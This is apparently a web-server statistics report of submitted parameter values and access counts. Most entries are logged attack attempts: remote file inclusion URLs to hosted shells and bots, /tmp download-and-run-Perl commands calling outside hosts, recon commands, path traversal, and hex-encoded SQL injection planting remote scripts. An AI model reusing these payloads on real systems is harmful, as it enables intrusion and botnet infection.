http://oursoultvxq.com/bbs/data/bbs/chi.txt??	1
http://cluster76.bannaipol.org/includes/chi.txt??	1
Parameter	option
Value	Accesses
com_poll	2
Parameter	pag
Value	Accesses
http://www.fmweb.it/plugins/system/README.txt?	2
OTHER:	2,361
Script	Total Accesses
/wusage/summary/cgi.html//components/com_galleria/galleria.h tml.php	2,256
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
uname -a; id	20
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	13
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	11
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www1.freewebs.c om/sur00tec/srz.txt;fetch http://www1.freewebs.com/sur00tec/ srz.txt;curl -o http://www1.freewebs.com/sur00tec/srz.txt;wg et http://www1.freewebs.com/sur00tec/srz.txt;perl srz.txt;rm srz.txt	7
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	6
id	6
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3 .ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt	6
cd /tmp;rm enviar.txt;wget http://br.geocities.com/svconts/e nviar.txt;fetch http://br.geocities.com/svconts/enviar.txt;l wp-download http://br.geocities.com/svconts/enviar.txt;curl -O http://br.geocities.com/svconts/enviar.txt;lynx http://br .geocities.com/svconts/enviar.txt;perl enviar.txt	3
cd /tmp;wget http://www.iakh.de/oneadmin/calendar/ao.txt;cur l -O -f http://www.iakh.de/oneadmin/calendar/ao.txt;lynx -so urce http://www.iakh.de/oneadmin/calendar/ao.txt;lwp-rget ht tp://www.iakh.de/oneadmin/calendar/ao.txt;fetch http://www.i akh.de/oneadmin/calendar/ao.txtt;perl ao.txt;rm -rf ao.txt	3
cd /tmp;wget http://www.iradex.kit.net/spk/spk.txt;curl -O h ttp://www.iradex.kit.net/spk/spk.txt;lwp-download -a http:// www.iradex.kit.net/spk/spk.txt;GET http://www.iradex.kit.net /spk/spk.txt;lynx -source http://www.iradex.kit.net/spk/spk. txt;links -source http://www.iradex.kit.net/spk/spk.txt;perl spk.txt;rm -rf spk.txt;rm -rf spk001.txt	3
Parameter	list
Value	Accesses
1	13
Parameter	mosConfig_absolute_path
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	41
http://www.jungo8949.co.kr/tool25.txt?	34
http://invisionar.hostinggratisargentina.com/eth0?	29
http://www.freewebs.com/yahwek/sete.txt?	28
http://usuarios.arnet.com.ar/larry123/safe.txt?	27
http://normanzito.iespana.es/http.txt??	24
	22
http://usuarios.arnet.com.ar/larry123/exploit.txt?	21
http://208.74.174.183/brizola.txt?	20
http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt ??	20
OTHER:	1,899
Script	Total Accesses
/wusage/summary/cgi.html//components/com_extcalendar/admin_e vents.php	2,192
Parameters by Submitted Value
Parameter	CONFIG_EXT[LANGUAGES_DIR
Value	Accesses
	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
	5
Parameter	CONFIG_EXT[LANGUAGES_DIR] http://human-design.ru/adm/faqsupp ort/config/tester.txt?
Value	Accesses
	1
Parameter	CONFIG_EXT[LANGUAGES_DIR] http://www.apocalypticduck.com/ski ns/advanced/config/tester.txt?
Value	Accesses
	1
Parameter	CONFIG_EXT[LANGUAGES_DIR] http://x-tal.ajou.ac.kr/zeroboard/ skin/zero_vote/tester.txt?
Value	Accesses
	2
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://ch3z.max-host.pl/z/z/k.txt?	138
http://www.jungo8949.co.kr/tool25.txt?	74
http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt?	43
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt?	37
http://invisionar.hostinggratisargentina.com/eth0?	34
	33
http://usuarios.arnet.com.ar/larry123/safe.txt?	28
http://ownsirc.googlepages.com/botnet.txt?	27
http://www.freewebtown.com/johnkid/tester.txt?	26
http://chez.ugu.pl/z/z/k.txt?	26
Parameter	CONFIG_EXT[LANGUAGES_DIR]\r
Value	Accesses
	2
Parameter	CONFIG_EXT[LANGUAGES_DIR]http://211.236.244.133/~axlonaxlon/ shell.txt?
Value	Accesses
	3
Parameter	CONFIG_EXT[LANGUAGES_DIR]http://82.195.129.64/~magnadon/shel l.txt?
Value	Accesses
	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]http://abdclub.com/xcart/guide/work ing_with_orders.txt?
Value	Accesses
	1
OTHER:	1,709
Script	Total Accesses
/wusage/summary/	2,062
Parameters by Submitted Value
Parameter
Value	Accesses
	4
Parameter	';DECLARE @S CHAR(4000);SET @S
Value	Accesses
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2 F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2 E313030306D672E636E2F63737273732F772E6A73223E3C2F73637269707 43E3C212D2D272720776865726520272B40432B27206E6F74206C696B652 0272725223E3C2F7469746C653E3C736372697074207372633D226874747 03A2F2F73646F2E	16
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F777777332E73733131716E2E6 36E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2 D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206 C696B6520272725223E3C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F	1
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2 F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7 5736572732E35312E6C612F323038383739342E6A73223E3C2F736372697 0743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6 520272725223E3C2F7469746C653E3C736372697074207372633D2268747 4703A2F2F6A732E	1
Parameter	;DECLARE @S CHAR(4000);SET @S
Value	Accesses
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2 F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2 E313030306D672E636E2F63737273732F772E6A73223E3C2F73637269707 43E3C212D2D272720776865726520272B40432B27206E6F74206C696B652 0272725223E3C2F7469746C653E3C736372697074207372633D226874747 03A2F2F73646F2E3	15
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2 F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7 5736572732E35312E6C612F323038383739342E6A73223E3C2F736372697 0743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6 520272725223E3C2F7469746C653E3C736372697074207372633D2268747 4703A2F2F6A732E7	1
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F777777332E73733131716E2E6 36E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2 D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206 C696B6520272725223E3C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F7	1
Parameter
Value	Accesses
http://www.wingraphics.com/calendar/id?	1
Parameter	??????mosConfig_absolute_path
Value	Accesses
http://www.larisco.com/id.txt??	2
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://www.readingastro.org.uk/graphics/moon/id.txt??	4
http://www.klammehand.be/forum/language/lang_polish/idmic2.t xt?	2
http://ebooks.siteburg.com/chid.txt??	2
http://www.readingastro.org.uk//wap/in/id.txt??	2
http://suwung.890m.com/test.txt???	2
http://www.readingastro.org.uk/images/photos/about/id.txt??	1
http://www.belgraver-warffemius.nl/genealogy/lazarusgb/publi c/job.txt??	1
http://www.skd.it/vwar/admin/can?	1
http://hist.hongik.ac.kr/zb4pl6/data/teszos?	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt ??	1
../../../../../../../../../../../../../../../../../../../../ ../../../../proc/self/environ	1
../../../../../../../../../../../../../../../../../../../../ ../../../../proc/self/environ	1
http://www.longbeachphotosbc.ca/buggsbunny??	1
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.netpressz.hu/wap/cmd.txt??	3
http://heatingfilm.com//kboard/data/bajo-id.txt???	2
http://www.covoiturage.fr/CALC/id2.txt???	1
http://www.belgraver-warffemius.nl/genealogy/lazarusgb/publi c/job.txt??	1
http://mail.tu-varna.bg/test.txt???	1
http://www.usher.co.kr//flvPlay/fx29id.txt?	1
http://8o0o8.info/id/id/id.txt????	1
Parameter	GLOBALS[binn_include_path]
Value	Accesses
http://datacore.fileave.com/id.txt??	1
Parameter	GLOBALS[mosConfig_absolute_path]
Value	Accesses
http://www.vanderjagt-kraanverhuur.nl/id.txt?	2
OTHER:	1,987
Script	Total Accesses
/wusage/summary/cgi.html//transcripts.php	2,024
Parameters by Submitted Value
Parameter	action
Value	Accesses
view	159
http://ownsirc.googlepages.com/botnet.txt?	30
http://www.freewebs.com/yahwek/phpbot.txt?	28
http://www.oslutadores.com/?id=23530	28
http://www.jungo8949.co.kr/tool25.txt?	23
	20
http://www.pucorp.t5.com.br/lp.txt?	18
http://www.neoncomanda.kit.net/tool25.dat?	18
http://yahwek.dll.googlepages.com/phpbot.txt?	16
http://204.11.228.115/id.txt?	15
Parameter	cmd
Value	Accesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	8
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
uname -a; id	5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
cd /tmp;wget http://www.1peninsulaintermedia.net/familytree/ bash/priv.txt;curl -O -f http://www.1peninsulaintermedia.net /familytree/bash/priv.txt;lynx -source http://www.1peninsula intermedia.net/familytree/bash/priv.txt;lwp-rget http://www. 1peninsulaintermedia.net/familytree/bash/priv.txt;fetch http ://www.1peninsulaintermedia.net/familytree/bash/priv.txt;per l priv.txt;rm -rf priv.txt;rm -rf priv001.txt	3
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt	3
Parameter	deptid
Value	Accesses
1	155
http://204.11.228.115/id.txt?	4
Parameter	list
Value	Accesses
1	1
Parameter	search_string
Value	Accesses
http://www.fabiofotografo.com.br/js/var.txt??	26
http://www.jungo8949.co.kr/tool25.txt?	23
http://201.37.71.117:8090/tool25.txt?	5
http://proxysx.t35.com/x0.txt?	4
http://xsenharox.xpg.com.br/e_sempre_nois.txt?	4
http://204.11.228.115/id.txt?	4
http://usuarios.arnet.com.ar/larry123/safe.txt?	4
http://www.chamala.kit.net/tool25.txt?	4
http://pucorp.org/pbot.txt?	3
http://freewebtown.com/trabalho/CMD.txt?	3
Parameter	userid
Value	Accesses
0	155
OTHER:	1,209
Script	Total Accesses
/wusage/summary/cgi.html//phplive/setup/header.php	2,016
Parameters by Submitted Value
Parameter	?v
Value	Accesses
	1
Parameter	cmd
Value	Accesses
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	17
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	13
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p erl botx2.txt;rm -rf txt	11
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	10
cd /tmp;lwp-download http://h1.ripway.com/arroba5/botx.txt;p erl botx.txt;rm -rf botx	10
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2. txt;rm -rf txt	9
uname -a; id	8
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
cd /tmp;wget http://208.100.59.56/nanaozin.txt;curl -O -f ht tp://208.100.59.56/nanaozin.txt;lynx -source http://208.100. 59.56/nanaozin.txt;lwp-rget http://208.100.59.56/nanaozin.tx t;fetch http://208.100.59.56/nanaozin.txt;perl nanaozin.txt; rm -rf nanaozin.txt	7
Parameter	css_path
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	76
http://h1.ripway.com/tsk4/cmd.txt?	40
http://catholique-sartrouville-78.cef.fr/IMG/dna.txt	33
http://houdateamo.altervista.org/dna.txt	28
http://yahwek.dll.googlepages.com/phpbot.txt?	27
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt?	26
http://www.jungo8949.co.kr./tool25.txt?	25
http://www.capsoir.com/images/TRA.txt?	22
http://www.geneseobeadstudio.com/cmds.txt?	19
http://www.bergenfest.no/vnc/cmd.txt?	19
Parameter	list
Value	Accesses
1	1
OTHER:	1,596
Script	Total Accesses
/wusage/summary/cgi.html//phplive/message_box.php	1,954
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	13
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
uname -a; id	4
id	4
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	3
Parameter	deptid
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	23
http://www.fabiofotografo.com.br/js/var.txt??	10
http://201.37.71.117:8090/tool25.txt?	5
http://proxysx.t35.com/x0.txt?	4
http://204.11.228.115/id.txt?	4
http://www.chamala.kit.net/tool25.txt?	4
http://xsenharox.xpg.com.br/e_sempre_nois.txt?	4
http://snock.host.sk/php.txt??	3
http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt?	3
http://pucorp.org/pbot.txt?	3
Parameter	l
Value	Accesses
ezpub	135
http://204.11.228.115/id.txt?	4
Parameter	list
Value	Accesses
1	1
Parameter	theme
Value	Accesses
	158
http://ownsirc.googlepages.com/botnet.txt?	30
http://www.oslutadores.com/?id=23530	28
http://www.freewebs.com/yahwek/phpbot.txt?	28
http://www.jungo8949.co.kr/tool25.txt?	21
http://www.neoncomanda.kit.net/tool25.dat?	19
http://www.pucorp.t5.com.br/lp.txt?	18
http://www.capsoir.com/images/TRA.txt?	16
http://204.11.228.115/id.txt?	15
http://yahwek.dll.googlepages.com/phpbot.txt?	15
Parameter	x
Value	Accesses
1	131
http://204.11.228.115/id.txt?	4
OTHER:	1,199
Script	Total Accesses
/wusage/summary/cgi.html/components/com_performs/performs.ph p	1,869
Parameters by Submitted Value
Parameter
Value	Accesses
http://boneunix.by.ru/good.txt?	1
Parameter	cmd
Value	Accesses
cd /tmp;rm ng;wget http://ownz-you.com/ng.txt;fetch http:// ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt; curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/ ng.txt;perl ng.txt;rm -rf ng	8
cd /tmp;rm x.txt;wget http://baixinho.we.bs/x.txt;fetch http ://baixinho.we.bs/x.txt;lwp-download http://baixinho.we.bs/x .txt;curl -O http://baixinho.we.bs/x.txt;lynx http://baixinh o.we.bs/x.txt;perl x.txt	5
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	5
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt. kit.net/root.txt;perl root.txt	4
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot 123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt; lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl - O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt	3
cd /tmp;rm ful.txt;wget http://71.41.190.203/ful.txt;fetch h ttp://71.41.190.203/ful.txt;lwp-download http://71.41.190.20 3/ful.txt;curl -O http://71.41.190.203/ful.txt;lynx http://7 1.41.190.203/ful.txt;perl ful.txt;rm -rf ful.txt*	3
killall -9 perl;rm spriter1.txt;wget http://www.hobbiz.com/U P/spriter1.txt;curl -o spriter1.txt http://www.hobbiz.com/UP /spriter1.txt;perl spriter1.txt	3
uname -a; id	3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i p1.txt;perl ros1.txt;perl scanasc.txt	3
wget http://www.hobbiz.com/UP/spriter1.txt;curl -o spriter1. txt http://www.hobbiz.com/UP/spriter1.txt;perl spriter1.txt	3
Parameter	list
Value	Accesses
1	3
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	40
http://www.dunakom.hu/userimages/id.txt?	31
http://ownsirc.googlepages.com/botnet.txt?	26
http://xredrum.com/id.txt?	24
http://208.74.174.183/brizola.txt?	20
http://www.mta.cl/galeria2/galery.txt?	18
http://201.37.71.117:8090/cmd.txt??	17
ftp://84.32.137.157/incoming/upload/trem/oldbisok??	16
http://carnet.sakura.ne.jp/cscart_dir/skins/echo3?	15
http://arabx1st.iifree.net/safe.txt??	15
Parameter	nst
Value	Accesses
whoami	1
OTHER:	1,602
Script	Total Accesses
/wusage/summary/cgi.html//message_box.php	1,810
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	13
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
uname -a; id	4
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	4
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	3
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.101.97:9090/s1t2 a3r4t.txt;fetch http://189.24.101.97:9090/s1t2a3r4t.txt;lwp- download http://189.24.101.97:9090/s1t2a3r4t.txt;curl -O htt p://189.24.101.97:9090/s1t2a3r4t.txt;lynx http://189.24.101. 97:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt	3
Parameter	l
Value	Accesses
admin	130
http://204.11.228.115/id.txt?	4
Parameter	list
Value	Accesses
1	1
Parameter	theme
Value	Accesses
	153
http://ownsirc.googlepages.com/botnet.txt?	31
http://www.freewebs.com/yahwek/phpbot.txt?	28
http://www.oslutadores.com/?id=23530	28
http://www.jungo8949.co.kr/tool25.txt?	22
